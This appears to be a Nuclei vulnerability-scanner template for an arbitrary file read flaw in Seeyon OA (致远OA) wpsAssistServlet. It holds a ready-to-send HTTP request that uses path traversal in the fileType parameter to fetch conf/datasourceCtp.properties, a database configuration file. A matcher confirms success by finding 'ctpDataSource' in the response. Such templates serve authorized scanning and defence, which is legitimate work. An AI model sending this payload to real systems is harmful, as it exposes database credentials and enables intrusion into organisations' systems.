id: seeyon-wpsassistservlet-filetype-fileread

info:
  name: 致远OA wpsAssistServlet fileType参数任意文件读取
  author: SleepingBag945
  severity: high


http:
  - raw:
      - |
        GET /seeyon/wpsAssistServlet?flag=open&fileId=-1233531&fileType=/../../conf/datasourceCtp.properties HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip
        Accept-Language: en

        



    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains(body,"ctpDataSource")

